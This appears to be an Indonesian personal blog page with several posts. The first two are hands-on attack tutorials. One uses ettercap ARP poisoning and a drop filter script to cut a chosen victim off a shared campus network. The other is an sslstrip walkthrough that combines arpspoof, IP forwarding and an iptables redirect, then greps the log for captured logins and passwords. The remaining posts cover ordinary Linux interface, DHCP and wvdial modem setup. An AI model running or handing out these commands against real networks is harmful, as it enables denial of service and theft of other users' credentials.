akhir2 ini gw lumayan dongkol dengan koneksi dikesekretariatan bersama dikampuz gw yang dimana jaringan internetnya dalam 1 jaringan.. awalnya kendalanya adalah client yang make hub dan sering ganti2 ip sementara sudah dapat jatah IP masing2. geram sih gw. tapi mau diapalah.. gw cuma bisa monitoring. untung gw make LINUX. hehe. lama kelamaan makin menjadi-jadi setelah keterangan dari wireshark menayangkan error yang sangat banyak, keterangan errornya adalah duplicate IP yang random. setiap hostname tersebut OL, pasti jaringan kacau. hostnamenya adalah “NUMPANK-OM”. ternyata komputer tersebut kena virus yang bikin kacau jaringan. inisiatif gw bagi tugas dengan temen gw aji. hehe, kayak FBI aja. dia ngecut koneksi dari IP yang bermasalah tersebut dan ngeflood balik. mau gak mau harus seperti itu, kalo nggak ya semua client pada kacau. tapi tetep gak kapok n kayaknya semua yang pake windus mulai terinfeksi.. (doh) payah ni sistem operasi satu nih. ya udah, gw coba cara yang menurut gw ampuh ini.. hehe. yaitu dengan metode ARP POISONING. gak usah dijelasin, langsung praktek aja yah. implementasinya begini :

(disarankan untuk memakai LINUX)
1. install ettercap
2. jalankan ettercap
3. pilih sniff -> unnified sniffing -> dan pilih interface yang terkoneksi tersebut.

Listening on eth1… (Ethernet)

eth1 -> 00:16:E6:DC:F1:DB 172.16.30.7 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

4. kemudian pilih host -> scan for host (tunggu sampai scanning selesai.

Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
30 hosts added to the hosts list…

5. kemudian pilih host -> host list
disitu ada list ip client yang sedang OL, contohnya salah satunya : 172.16.30.6 <- ini adalah IP victim yang akan kita putuskan koneksinya. klik di IP tersebut dan klik "add to target 1"

Host 172.16.30.6 added to TARGET1

6. kemudian buat file (terserah mau pake kate,gedit,atai apapun editor kesenangan anda) dan masukkan script ini :

if (ip.src == ’172.16.30.6′ || ip.dst == ’172.16.30.6′) {
drop();
kill();
msg(“Packet Dropped\n”);
}

nb : ip 172.16.30.6 disesuaikan dengan IP target anda
fite tersebut save ke dalam bentuk *.eft – ex: target.eft

7. convert file tersebut ke target.ef dan copy ke /usr/share/ettercap/
spyro@dhymaz-chua:~$ sudo etterfilter target.eft -o target.ef
spyro@dhymaz-chua:~$ sudo cp target.ef /usr/share/ettercap/

8. kembali ke ettercap, kemudiam pilih mitm -> arp poisoning -> centang “sniff remote connection” dan klik ok.

ARP poisoning victims:

GROUP 1 : 172.16.30.6 00:14:85:2D:50:3B

GROUP 2 : ANY (all the hosts in the list)

9. klik filters -> load a filter dan pilih file target.ef tadi yang telah dibuat.

GROUP 2 : ANY (all the hosts in the list)
Content filters loaded from /usr/share/ettercap/sekber.ef…

10. dan saya telah memastikannya, ngeping ke server lancar, ngeping ke internet lancar, ngeping ke ip victim lancar, tapi victim tidak akan bisa konek ke internet.

begitulah kurang lebih penjelasannya. selamat mencoba… (target yang saya serang dalam membuat artikelini menggunakan windows).
ettercap juga bisa dipakai untuk mematikan gateway. wow seremm.. haha.. masih banyak lagi yang bisa dilakukan oleh ettercap.. pinter2 explorasi aja yaa ^_^

regards : dhymaz_spyro

setelah jungkir balik kanan kiri guling-guling sampe gelas kopi pecah, akhirnya dapet suatu software yang yaa lumayan menurutku untuk menghack protocol https alias ssl hijacking. keterangannya silahkan baca disini atau disini dan juga disini dan masih banyak lagi…

nge-bacrit selesai.. langsung ke TKP :

1. semisal aja,
attacker : 172.192.30.30
victim : 172.192.30.40
gateway : 172.192.30.254

information : artikel ini menggunakan sistem operasi linux

2. command : sslstrip
manual options:
-w , –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l , –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message

3 . execute :
root@spyro:~# sslstrip -a -w logfilename

4. execute arpspoof of the victim :
root@spyro:~# arpspoof -i vmnet1 -t 172.192.30.40 172.192.30.254

5. activate a ip_forward function :
root@spyro:~# echo 1 > /proc/sys/net/ipv4/ip_forward

6. redirect http port victim communication to sslstrip port
root@spyro:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000

nah, ketika victim melakukan login ke port https, maka username n passwordnya akan tercatat di log file dump yang kita buat (dalam artikel ini nama filenya “logfilename”)

7. view a dump log file :
root@spyro:~# cat logfilename | grep -i “passwd=”

lihat dan cari kata kunci “login=” dan “passwd=”
ex : login=dhymaz_spyro&passwd=djancuukkk

thankz to laharisi

Untuk menghidupkan kartu jaringan ethernet (LAN):

ifconfig eth0 up

Untuk mendapatkan DHCP untuk menetapkan alamat jaringan secara otomatis dari server DHCP:

dhcpcd eth0

Ini akan menjalankan hanya pada eth0, jika anda menghilangkan interface,maka Anda akan menjalankan proses penemuan DHCP pada semua kartu yang kompatibel.

Lalu periksa apakah Anda memiliki alamat:

ifconfig eth0

Anda akan melihat alamat IP di sana.

Jika Anda menginginkan sebuah alamat IP statis dinamis, bukan satu:

ifconfig eth0
example :
ifconfig eth0 192.168.1.2

Untuk secara manual menambahkan default gateway:

route add default gw 192.168.1.1 eth0

Untuk secara manual menetapkan DNS server anda:

echo nameserver 192.168.1.1 > /etc/resolv.conf echo nameserver 212.135.1.36 >> /etc/resolv.conf

Semua ini mungkin telah dilakukan untuk anda secara otomatis dengan DHCP, jadi untuk memeriksa:

cat /etc/resolv.conf

Ini akan menampilkan kepada Anda isi dari file / etc / resolv.conf file.

Untuk mengubah alamat DHCP Anda jika telah ditetapkan Anda perlu menghapus file DHCP yang ditetapkan ke kartu:

rm /etc/dhcpc/dhcpcd-eth0.pid

Walaupun yang dapat berubah berdasarkan pada interface yang Anda miliki!
Kemudian jalankan kembali perintah dhcpcd.

yang penting detek aja di ubuntunya… hehe. oke, langsung aja colok modem usbnya :

dhymaz@dhymaz-spyro:~$ sudo su
[sudo] password for dhymaz:
root@dhymaz-spyro:/home/dhymaz# wvdialconf
Editing `/etc/wvdial.conf’.

Scanning your serial ports for a modem.

ttyS0<*1>: ATQ0 V1 E1 — failed with 2400 baud, next try: 9600 baud
ttyS0<*1>: ATQ0 V1 E1 — failed with 9600 baud, next try: 115200 baud
ttyS0<*1>: ATQ0 V1 E1 — and failed too at 115200, giving up.
Modem Port Scan<*1>: S1   S2   S3
WvModem<*1>: Cannot get information for serial port.
ttyUSB0<*1>: ATQ0 V1 E1 — failed with 2400 baud, next try: 9600 baud
ttyUSB0<*1>: ATQ0 V1 E1 — failed with 9600 baud, next try: 9600 baud
ttyUSB0<*1>: ATQ0 V1 E1 — and failed too at 115200, giving up.
WvModem<*1>: Cannot get information for serial port.
ttyUSB1<*1>: ATQ0 V1 E1 — failed with 2400 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 — failed with 9600 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 — and failed too at 115200, giving up.
WvModem<*1>: Cannot get information for serial port.
ttyUSB2<*1>: ATQ0 V1 E1 — failed with 2400 baud, next try: 9600 baud
ttyUSB2<*1>: ATQ0 V1 E1 — failed with 9600 baud, next try: 9600 baud
ttyUSB2<*1>: ATQ0 V1 E1 — and failed too at 115200, giving up.
WvModem<*1>: Cannot get information for serial port.
ttyUSB3<*1>: ATQ0 V1 E1 — OK
ttyUSB3<*1>: ATQ0 V1 E1 Z — OK
ttyUSB3<*1>: ATQ0 V1 E1 S0=0 — OK
ttyUSB3<*1>: ATQ0 V1 E1 S0=0 &C1 — OK
ttyUSB3<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 — OK
ttyUSB3<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK
ttyUSB3<*1>: Modem Identifier: ATI — Manufacturer: Sierra Wireless, Inc.
ttyUSB3<*1>: Speed 9600: AT — OK
ttyUSB3<*1>: Max speed is 9600; that should be safe.
ttyUSB3<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK
WvModem<*1>: Cannot get information for serial port.
ttyUSB4<*1>: ATQ0 V1 E1 — OK
ttyUSB4<*1>: ATQ0 V1 E1 Z — OK
ttyUSB4<*1>: ATQ0 V1 E1 S0=0 — OK
ttyUSB4<*1>: ATQ0 V1 E1 S0=0 &C1 — OK
ttyUSB4<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 — OK
ttyUSB4<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK
ttyUSB4<*1>: Modem Identifier: ATI — C885
ttyUSB4<*1>: Speed 9600: AT — OK
ttyUSB4<*1>: Max speed is 9600; that should be safe.
ttyUSB4<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK
WvModem<*1>: Cannot get information for serial port.
ttyUSB5<*1>: ATQ0 V1 E1 — OK
ttyUSB5<*1>: ATQ0 V1 E1 Z — OK
ttyUSB5<*1>: ATQ0 V1 E1 S0=0 — OK
ttyUSB5<*1>: ATQ0 V1 E1 S0=0 &C1 — OK
ttyUSB5<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 — OK
ttyUSB5<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK
ttyUSB5<*1>: Modem Identifier: ATI — C885
ttyUSB5<*1>: Speed 9600: AT — OK
ttyUSB5<*1>: Max speed is 9600; that should be safe.
ttyUSB5<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK
WvModem<*1>: Cannot get information for serial port.
ttyUSB6<*1>: ATQ0 V1 E1 — OK
ttyUSB6<*1>: ATQ0 V1 E1 Z — OK
ttyUSB6<*1>: ATQ0 V1 E1 S0=0 — OK
ttyUSB6<*1>: ATQ0 V1 E1 S0=0 &C1 — OK
ttyUSB6<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 — OK
ttyUSB6<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK
ttyUSB6<*1>: Modem Identifier: ATI — C885
ttyUSB6<*1>: Speed 9600: AT — OK
ttyUSB6<*1>: Max speed is 9600; that should be safe.
ttyUSB6<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 — OK

Found a modem on /dev/ttyUSB3.
Modem configuration written to /etc/wvdial.conf.
ttyUSB3<Info>: Speed 9600; init “ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0″
ttyUSB4<Info>: Speed 9600; init “ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0″
ttyUSB5<Info>: Speed 9600; init “ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0″
ttyUSB6<Info>: Speed 9600; init “ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0″

nah, sekarang tinggal edit sedikit di file /etc/wvdial.conf

root@dhymaz-spyro:/home/dhymaz# nano /etc/wvdial.conf

Init3 = AT+CGDCONT=1,\”IP\”,\”internet\”

tambahkan 1 baris tersebut dibawah tulisan
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0

kemudian edit baris username, password, dan dialer.

jadi kurang lebih, isi filenya seperti ini :

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,\”IP\”,\”internet\”
Modem Type = Analog Modem
Baud = 9600
New PPPD = yes
Modem = /dev/ttyUSB3
ISDN = 0
Phone = *99***1#
Password = ”
Username = ”